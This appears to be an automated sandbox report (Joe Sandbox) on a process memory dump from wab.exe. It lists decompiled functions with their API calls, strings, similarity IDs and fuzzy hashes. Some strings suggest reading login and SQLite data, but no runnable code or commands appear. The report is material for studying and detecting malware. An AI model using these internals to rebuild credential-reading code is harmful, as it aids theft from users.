                                                    • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                    • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                  • wcslen.MSVCRT ref: 0040D1D3
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                  • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                  • memcpy.MSVCRT ref: 0040D24C
                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                  • String ID: strings
                                                  • API String ID: 3166385802-3030018805
                                                  • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                  • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                  • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                  • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                  Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 00411AF6
                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                  • wcsrchr.MSVCRT ref: 00411B14
                                                  • wcscat.MSVCRT ref: 00411B2E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileModuleNamememsetwcscatwcsrchr
                                                  • String ID: AE$.cfg$General$EA
                                                  • API String ID: 776488737-1622828088
                                                  • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                  • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                  • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                  • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                  Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040D8BD
                                                  • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                  • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                  • memset.MSVCRT ref: 0040D906
                                                  • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                  • _wcsicmp.MSVCRT ref: 0040D92F
                                                    • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                    • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                  • String ID: sysdatetimepick32
                                                  • API String ID: 1028950076-4169760276
                                                  • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                  • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                  • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                  • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                  Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID: -journal$-wal
                                                  • API String ID: 438689982-2894717839
                                                  • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                  • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                  • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                  • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                  Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                  • EndDialog.USER32(?,00000002), ref: 00405C83
                                                  • EndDialog.USER32(?,00000001), ref: 00405C98
                                                    • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                    • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                  • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Item$Dialog$MessageSend
                                                  • String ID:
                                                  • API String ID: 3975816621-0
                                                  • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                  • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                  • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                  • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                  Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _wcsicmp.MSVCRT ref: 00444D09
                                                  • _wcsicmp.MSVCRT ref: 00444D1E
                                                  • _wcsicmp.MSVCRT ref: 00444D33
                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp$wcslen$_memicmp
                                                  • String ID: .save$http://$https://$log profile$signIn
                                                  • API String ID: 1214746602-2708368587
                                                  • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                  • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                  • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                  • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                  Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                  • String ID:
                                                  • API String ID: 2313361498-0
                                                  • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                  • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                  • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                  • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                  Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetClientRect.USER32(?,?), ref: 00405F65
                                                  • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                  • GetWindow.USER32(00000000), ref: 00405F80
                                                    • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                  • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                  • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                  • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMessageRectSend$Client
                                                  • String ID:
                                                  • API String ID: 2047574939-0
                                                  • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                  • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                  • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                  • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                  Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                  • memcpy.MSVCRT ref: 0044A8BF
                                                  • memcpy.MSVCRT ref: 0044A90C
                                                  • memcpy.MSVCRT ref: 0044A988
                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                  • memcpy.MSVCRT ref: 0044A9D8
                                                  • memcpy.MSVCRT ref: 0044AA19
                                                  • memcpy.MSVCRT ref: 0044AA4A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID: gj
                                                  • API String ID: 438689982-4203073231
                                                  • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                  • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                  • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                  • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                  Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                  • API String ID: 3510742995-2446657581
                                                  • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                  • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                  • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                  • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                  Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                  • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                  • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                  • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                  • memset.MSVCRT ref: 00405ABB
                                                  • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                  • SetFocus.USER32(?), ref: 00405B76
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$FocusItemmemset
                                                  • String ID:
                                                  • API String ID: 4281309102-0
                                                  • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                  • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                  • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                  • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                  Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintfwcscat
                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                  • API String ID: 384018552-4153097237
                                                  • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                  • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                  • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                  • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                  Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                  • String ID: 0$6
                                                  • API String ID: 2029023288-3849865405
                                                  • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                  • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                  • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                  • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                  Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                  • memset.MSVCRT ref: 00405455
                                                  • memset.MSVCRT ref: 0040546C
                                                  • memset.MSVCRT ref: 00405483
                                                  • memcpy.MSVCRT ref: 00405498
                                                  • memcpy.MSVCRT ref: 004054AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$memcpy$ErrorLast
                                                  • String ID: 6$\
                                                  • API String ID: 404372293-1284684873
                                                  • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                  • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                  • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                  • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                  Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                  • wcscpy.MSVCRT ref: 0040A0D9
                                                  • wcscat.MSVCRT ref: 0040A0E6
                                                  • wcscat.MSVCRT ref: 0040A0F5
                                                  • wcscpy.MSVCRT ref: 0040A107
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                  • String ID:
                                                  • API String ID: 1331804452-0
                                                  • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                  • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                  • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                  • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                  Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                  • String ID: advapi32.dll
                                                  • API String ID: 2012295524-4050573280
                                                  • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                  • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                  • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                  • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                  Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                  • <%s>, xrefs: 004100A6
                                                  • <?xml version="1.0" ?>, xrefs: 0041007C
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_snwprintf
                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                  • API String ID: 3473751417-2880344631
                                                  • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                  • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                  • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                  • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                  Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscat$_snwprintfmemset
                                                  • String ID: %2.2X
                                                  • API String ID: 2521778956-791839006
                                                  • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                  • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                  • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                  • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                  Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintfwcscpy
                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                  • API String ID: 999028693-502967061
                                                  • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                  • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                  • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                  • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                  Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memsetstrlen
                                                  • String ID:
                                                  • API String ID: 2350177629-0
                                                  • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                  • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                  • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                  • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                  Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset
                                                  • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                  • API String ID: 2221118986-1606337402
                                                  • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                  • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                  • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                  • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                  Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                  • String ID:
                                                  • API String ID: 265355444-0
                                                  • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                  • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                  • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                  • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                  Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
